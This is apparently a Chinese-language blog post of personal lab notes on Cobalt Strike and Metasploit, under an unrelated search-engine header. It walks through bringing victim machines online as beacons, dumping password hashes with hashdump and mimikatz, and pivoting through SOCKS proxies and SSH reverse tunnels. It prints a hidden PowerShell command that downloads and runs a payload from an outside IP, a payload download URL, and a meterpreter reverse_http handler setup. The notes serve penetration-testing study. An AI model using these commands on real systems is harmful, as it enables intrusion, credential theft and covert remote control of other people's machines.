自己做家具展示网站百度云搜索引擎入口网盘搜索神器
一、快捷工具栏
3、需要创建监听器,才能让靶机上线,连接我们公网服务端上去开启的帧监听端口,做任何操作
都是通过服务器的IP地址去连接靶机,去和靶机进行文件stage的一个传输和交互。这里推荐把cs
放到公网上边,比较方便让靶机上线。
4-6单个视图
11、payload分为stage和stageless(相当于php大马,拥有所有的功能,包括meterpreter,很大,不
需其他的管理器就能实现完全的交互,网络环境比较差的时候可以使用它,大并且容易查杀)
12、已淘汰
13、生成恶意Office宏攻击,嵌入恶意宏攻击。
14、建立web_delivery是在内存上执行恶意代码,不会再服务器上留下文件的。
查看进程:ps aux | grep teamserver
kali -9 进程 干掉进程
sudo yum install java-11-openjdk-devel(cs4.3版本java11环境)
sudo yum list installed | grep java(查看已安装java)
sudo alternatives --config java (切换环境)
java -version(查看版本)
export JAVA_HOME=$(dirname $(dirname $(readlink -f $(which java))))
echo $JAVA_HOME 设置环境变量(此两条命令直接在命令行执行)
sudo lsof -i :50050 查看端口状态
./msg 用户名 信息(发送给指定用户)
二、创建监听器listener
点击Cobalt strike——监听器——add
获取靶机上线stager,任何靶机上线都是通过服务端
查看端口是否在线 netstat -ano |grep 8080
三、学习:cobaltrike实战演示1:
创建完监听器后,想让靶机上线(那就攻击靶机)
云服务器用作实验的话,如果安全组不需要特定要求,直接放通全部
靶机上线操作:
选择前边设置的监听器和方法(这里的方法我是用的是powershell)
选择文件保存位置,这里我保存到桌面为了方便(这个是windows10做的客户端)
之后需要再开启一个端口,让靶机可以下载这个文件,使用web-drive-by的host file,选择刚刚生
成的文件
复制下边内容
http://39.99.136.38:9090/download/file.ext
在靶机里边执行 (这使用的是windows7 64位操作系统)
此时靶机已上线
上线之后可以靶机进行一系列的控制
这里是默认60秒的心跳间隔(真实环境可以不修改,容易被ids查杀)
①设置时间间隔
②在beacon中 sleep 2亦可以设置
靶机想要下线就把进程(process)关掉,在这个界面退出会再次上线
shell ipconfig 命令
help 可以查看我们能执行的一些命令
重要模块
②转移③内存中获取密码④不建议开启(vps带宽较小,很卡)
screenshot截屏
在视图界面可以查看
亦可以端口扫描和查看进程
四、学习:cobaltrike实战演示2:
其他的监听器和attack进行一个主机上线,如下:
设置端口,监听器(同样如上执行,可以上线)
删除我们开启的东西
①mamager web server
②attacks ——web-driver-by ——manager
这如果在设置的时候没有copy,这里也是可以copy的
想关掉,直接选中,点击kill
端口扫描完可做如下操作:(三个视图模式)
脚本可以github搜,选择一个路径导入cna,成功会显示ready(√)
五、学习:cobaltrike攻击流程:
拿root和system权限
选择监听器和利用脚本
自动打出去
两个用户是不一样的
①hashdump命令或者②右击——执行——hash(读取用户哈希值)或者③右键run mimikatz's
此时在任务管理器运行着powwershell.exe把它杀死了就没了(可以利用msf做进程迁移)
先右击exit和remove把靶机移除掉(新操作)(因为直接remove会在自动上线)
比较安全
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://35.12.32.156:9091/a'))"复制此代码到靶机去执行
此处是dvwa靶场
此时靶机又上线了
靶机上线方法:
①命令执行②文件上传,上传webshell(工具执行连接),无报错有权限执行,靶机即可上线(如果
cs是在内网中的,确定靶机能够连到cs)
六、学习:cs和msf联动
1、cs联动msf之socks代理(访问内网或者无法直接访问的服务器就需要建立代理)
2、cs联动msf之外部监听器
3、练习
1、介绍:
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各
类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。
meterpreter的功能十分强大,模块非常多,攻击,辅助,编码等等,cs进行团队合作,进行主机
的上线和smb的横向移动(内网管控平台)
环境搭建条件:
①cs客户端一台windows10操作系统,一台centos7操作系统(或者kali操作系统也行)
②一台云服务器作为cs服务器(公网上vps)
③一台windows7(可联网),一台windows2012(不联网)
操作步骤:
①socks 端口(如 socks 1234)
可以在vps查看(netstat -ano|grep 1234)是否是监听状态
如何连接代理(代理是对服务端的,客户端只是连接服务器,所有的操作都是在服务端即vps操作
的)
复制上述命令转到msf中执行
此时整个msf就被代理到了1234端口,此时进行辅助端口扫描
非常慢
kali中操作
在文件中写入如下内容保存
此时还ping不了(ping在tcp/ip上一层(icmp)不能对ping代理转发,namp可以进行no ping 扫
描)
此时会很慢(因为走代理)
虚拟机——物理网卡——运营商交换机——路由——vps服务器(此时就可扫描重要端口,不全
扫)
结果如下:
2、学习:cs联动msf之外部监听器
①创建一个新的linstener
转移时会开
把system的sesion发给metetpreter
kali中
将cs服务器的session发送到cs客户端也就是meterpreter(kali这一端)
外网ping不通内网(即cs服务器无法通cs客户端)做代理转发
保存退出
重启生效(有隧道转发功能)
执行此命令就可代理转发
此时内网的8085端口和vps的8085端口就通了(去看拓扑图)
选择上线的主机——右键span转移——选择监听器——外部的http8085
拿到meterpreter
3、实操:操作步骤:
这里是提权一下后的ssystem权限的用户
①在vps中 vi /etc/ssh/sshd_config(sshd_config是服务端配置文件)
②AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes
③systemctl restart sshd.service或者systemctl restart sshd(这样才有隧道转发的功能)
④回到本地的 kali 中,通过 ssh 隧道做转发
创建ssh隧道常用的参数:
-C:压缩传输,提供传输速度
-f :将ssh传输转入后台执行,不占用当前的shell
-N:建立静默连接(建立了连接,但是看不到具体会话)
-g:允许远程主机连接本地用于转发的端口
-L:本地端口转发
-R:远程端口转发
-D:动态转发
-P指定ssh端口
⑤命令执行:ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22
含义解释:通过 119.xx.xx.xx 机器把外部的 8085 端口上的流量转到本地192.168.129.139 的 8085
端口上,而本地的 8085 端口上跑的又的监听器,所以,最终才造成 meterpreter本地上线的效
果。
⑥netstat -anltup 查看正在工作的端口
⑦netstat -tulnp |grep 8085查看服务器是否开启8085端口
此处有错误可以查杀pid kill pid即可(ssh)
⑧创建一个新的监听器
⑨在kali中启用msfconsole,设置参数
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.129.139
set lport 9999
show options
run
⑩ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22
最好检查一下是否设置成功:netstat -anltup(没有问题做如下操作)
等待stage发送
此时拿到了meterpreter(这个不知道是抽了什么风,重启虚拟机之后,我搞了两次才出来,多次
尝试)比较卡,此时可以拿shell(如果显示乱码 chcp 65001),进程迁移,exit退出
一、快捷工具栏
二、创建监听器listener
三、学习:cobaltrike实战演示1:
四、学习:cobaltrike实战演示2:
五、学习:cobaltrike攻击流程:
六、学习:cs和msf联动
1、介绍:
2、学习:cs联动msf之外部监听器
3、实操:操作步骤: